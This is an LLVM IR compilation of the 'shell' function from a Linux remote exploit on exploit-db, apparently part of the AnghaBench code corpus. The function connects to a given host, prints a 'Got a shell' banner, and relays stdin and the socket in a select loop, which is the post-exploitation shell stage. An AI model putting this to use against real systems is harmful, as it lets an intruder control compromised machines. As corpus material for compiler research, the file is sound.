; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_900.c_shell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_900.c_shell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@BS = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [249 x i8] c"--{ Got a shell\0A\0A--{ Updating Webster's\0A--{ definitely, adv.:\0A--{ 1. See specious\0A\0A--{ For the linguistically challenged...\0A--{ specious, adj. :\0A--{ 1. Having the ring of truth or plausibility but actually fallacious\0A--{ 2. Deceptively attractive\0A\0A\00", align 1
@STDIN_FILENO = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [7 x i8] c"select\00", align 1
@.str.2 = private unnamed_addr constant [5 x i8] c"read\00", align 1
@.str.3 = private unnamed_addr constant [31 x i8] c"\0A - Connection closed by user\0A\00", align 1
@.str.4 = private unnamed_addr constant [6 x i8] c"write\00", align 1
@.str.5 = private unnamed_addr constant [28 x i8] c"\0A - Connection terminated.\0A\00", align 1
@.str.6 = private unnamed_addr constant [18 x i8] c"\0A - Read failure\0A\00", align 1
@STDOUT_FILENO = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @shell(i8* %0, i32 %1) #0 {
  %3 = alloca i8*, align 8
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  %7 = alloca i8*, align 8
  %8 = alloca i64, align 8
  %9 = alloca i32, align 4
  store i8* %0, i8** %3, align 8
  store i32 %1, i32* %4, align 4
  store i32 0, i32* %5, align 4
  store i32 0, i32* %6, align 4
  %10 = load i32, i32* @BS, align 4
  %11 = zext i32 %10 to i64
  %12 = call i8* @llvm.stacksave()
  store i8* %12, i8** %7, align 8
  %13 = alloca i8, i64 %11, align 16
  store i64 %11, i64* %8, align 8
  %14 = load i8*, i8** %3, align 8
  %15 = load i32, i32* %4, align 4
  %16 = call i32 @conn(i8* %14, i32 %15)
  store i32 %16, i32* %5, align 4
  %17 = call i32 @printf(i8* getelementptr inbounds ([249 x i8], [249 x i8]* @.str, i64 0, i64 0))
  %18 = call i32 @FD_ZERO(i32* %9)
  br label %19

19:                                               ; preds = %82, %2
  br label %20

20:                                               ; preds = %19
  %21 = load i32, i32* @STDIN_FILENO, align 4
  %22 = call i32 @FD_SET(i32 %21, i32* %9)
  %23 = load i32, i32* %5, align 4
  %24 = call i32 @FD_SET(i32 %23, i32* %9)
  %25 = load i32, i32* %5, align 4
  %26 = add nsw i32 %25, 1
  %27 = call i32 @select(i32 %26, i32* %9, i32* null, i32* null, i32* null)
  %28 = icmp slt i32 %27, 1
  br i1 %28, label %29, label %31

29:                                               ; preds = %20
  %30 = call i32 @die(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0))
  br label %31

31:                                               ; preds = %29, %20
  %32 = load i32, i32* @STDIN_FILENO, align 4
  %33 = call i64 @FD_ISSET(i32 %32, i32* %9)
  %34 = icmp ne i64 %33, 0
  br i1 %34, label %35, label %56

35:                                               ; preds = %31
  %36 = load i32, i32* @BS, align 4
  %37 = call i32 @read(i32 0, i8* %13, i32 %36)
  store i32 %37, i32* %6, align 4
  %38 = load i32, i32* %6, align 4
  %39 = icmp slt i32 %38, 0
  br i1 %39, label %40, label %42

40:                                               ; preds = %35
  %41 = call i32 @die(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.2, i64 0, i64 0))
  br label %48

42:                                               ; preds = %35
  %43 = load i32, i32* %6, align 4
  %44 = icmp eq i32 %43, 0
  br i1 %44, label %45, label %47

45:                                               ; preds = %42
  %46 = call i32 @bye(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.3, i64 0, i64 0))
  br label %47

47:                                               ; preds = %45, %42
  br label %48

48:                                               ; preds = %47, %40
  %49 = load i32, i32* %5, align 4
  %50 = load i32, i32* %6, align 4
  %51 = call i32 @write(i32 %49, i8* %13, i32 %50)
  %52 = icmp slt i32 %51, 1
  br i1 %52, label %53, label %55

53:                                               ; preds = %48
  %54 = call i32 @die(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.4, i64 0, i64 0))
  br label %55

55:                                               ; preds = %53, %48
  br label %56

56:                                               ; preds = %55, %31
  %57 = load i32, i32* %5, align 4
  %58 = call i64 @FD_ISSET(i32 %57, i32* %9)
  %59 = icmp ne i64 %58, 0
  br i1 %59, label %60, label %82

60:                                               ; preds = %56
  %61 = load i32, i32* %5, align 4
  %62 = trunc i64 %11 to i32
  %63 = call i32 @read(i32 %61, i8* %13, i32 %62)
  store i32 %63, i32* %6, align 4
  %64 = load i32, i32* %6, align 4
  %65 = icmp eq i32 %64, 0
  br i1 %65, label %66, label %68

66:                                               ; preds = %60
  %67 = call i32 @bye(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.5, i64 0, i64 0))
  br label %74

68:                                               ; preds = %60
  %69 = load i32, i32* %6, align 4
  %70 = icmp slt i32 %69, 0
  br i1 %70, label %71, label %73

71:                                               ; preds = %68
  %72 = call i32 @die(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.6, i64 0, i64 0))
  br label %73

73:                                               ; preds = %71, %68
  br label %74

74:                                               ; preds = %73, %66
  %75 = load i32, i32* @STDOUT_FILENO, align 4
  %76 = load i32, i32* %6, align 4
  %77 = call i32 @write(i32 %75, i8* %13, i32 %76)
  %78 = icmp slt i32 %77, 1
  br i1 %78, label %79, label %81

79:                                               ; preds = %74
  %80 = call i32 @die(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.4, i64 0, i64 0))
  br label %81

81:                                               ; preds = %79, %74
  br label %82

82:                                               ; preds = %81, %56
  br label %19
}

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #1

declare dso_local i32 @conn(i8*, i32) #2

declare dso_local i32 @printf(i8*) #2

declare dso_local i32 @FD_ZERO(i32*) #2

declare dso_local i32 @FD_SET(i32, i32*) #2

declare dso_local i32 @select(i32, i32*, i32*, i32*, i32*) #2

declare dso_local i32 @die(i8*) #2

declare dso_local i64 @FD_ISSET(i32, i32*) #2

declare dso_local i32 @read(i32, i8*, i32) #2

declare dso_local i32 @bye(i8*) #2

declare dso_local i32 @write(i32, i8*, i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
